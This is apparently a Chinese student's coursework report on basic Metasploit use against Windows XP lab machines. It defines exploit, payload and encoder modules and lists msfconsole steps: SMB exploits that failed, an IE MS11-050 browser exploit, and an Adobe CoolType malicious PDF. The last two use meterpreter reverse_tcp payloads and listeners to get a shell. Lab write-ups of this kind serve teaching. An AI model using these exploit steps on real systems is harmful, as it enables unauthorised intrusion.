20145337《网络对抗技术》MSF基础应用

20145337《网络对抗技术》MSF基础应用

一、实验后回答问题

什么是exploit、payload、encode

• Metasploit这种模块化的设计，大大提高了代码的复用率。exploit(渗透攻击模块)利用漏洞或者配置弱点对目标进行攻击，payload(攻击载荷模块)作为一种手段，exploit通过填入和运行攻击载荷，获得远程的访问权限。encode(编码器模块)是工具之一，也是渗透攻击的一重保障——避免坏字符、使攻击载荷免杀。这3个模块是渗透攻击的核心，相辅相成。

二、实验总结与体会

• 通过这次实验，我学会了修改kali的IP，然后就能ping通了

• 为了和别的同学做不同的主动攻击，下载了4、5个虚拟机，通过这次实验，我学会了在虚拟机中装XP系统。实验的成功与否，有很多不确定的因素，比如中英文版本啊，可能我下载的虚拟机事先打好了补丁啊（虽然它写着原始版和纯净版）
• 这次实验很有意思，系统漏洞不容小觑，稍加利用就能变成渗透攻击的手段。对渗透攻击有了更深入的了解，最后要立一个FLAG，改掉拖延症

三、实验过程记录

ms03_049、ms06_040主动攻击

• 大家都做ms08_067,想找一个和大家不一样的.查了一下WinXPSP3，除了这个漏洞，其他漏洞像拒绝服务漏洞、任意写入权限提升漏洞太难操作了。

• 尝试了ms03_049、ms_06_040（本来想做killbill，因为电影挺好看，然鹅并没有符合条件的靶机）
• 这里的靶机是Win XP Professional原版

1. 输入msfconsole进入msf,search一下

1. 进入该漏洞模块的使用（use exploit/windows/smb/ms03_049_netapi）

2. show payload，找到一个比如shell_reverse_tcp；show targets

1. 设置攻击有效载荷（set payload generic/shell_reverse_tcp）、show options并设置相关数据

1. 输入exploit开始攻击

• 建立不了联接？关闭防火墙试试？还是不行

• 又试了ms06_040
• 真的做了挺多回，本来以为召唤盾牌就能成功的，看到坦克依然不成功，就发现自己想的太简单

• 也没成功，希望老师不要扣分，我毕竟和大家的主动攻击不一样呀（O_O），连不通我也很绝望

IE浏览器渗透攻击——MS11050安全漏洞

1. 开启msfconsole，输入use exploit/windows/browser/ms11_050_mshtml_cobjetelement
2. 输入info查看信息：

1. 设置对应的载荷set payload windows/meterpreter/reverese_tcp；

2. show options查看需要设置的相关信息：

3. 设置相关信息：set LHOST ‘kali Ip’、 set LPORT 5337、 set URIPATH baidu

1. exploit,有靶机需要访问的ip地址：
2. 在靶机IE上输入网址，并在靶机上查看信息。

1. 可以看见kali中显示一个session 1已经创建；
2. 输入命令sessions -i 1,开始连接，输入shell成功获取shell

Adobe阅读器渗透攻击

1. 开启msfconsole、输入命令use exploit/windows/fileformat/adobe_cooltype_sing

2. 使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷,show options

1. 输入exploit,生成pdf文件，并可以看到pdf所在文件夹，将pdf复制到靶机里。

1. 使用use exploit/multi/handler新建一个监听模块

1. 使用set payload 建立一个反向连接，设置set LPORT 5337

1. 使用命令exploit开始攻击，在xp中打开pdf。同时kali会显示连接成功的结果。
2. 输入shell获取靶机信息

1. 在靶机xp中使用命令netstat -an,看本地tcp连接

辅助模块

• 本来尝试了书上的“开放代理探测与应用”，但是run不起来

• 枚举系统上的用户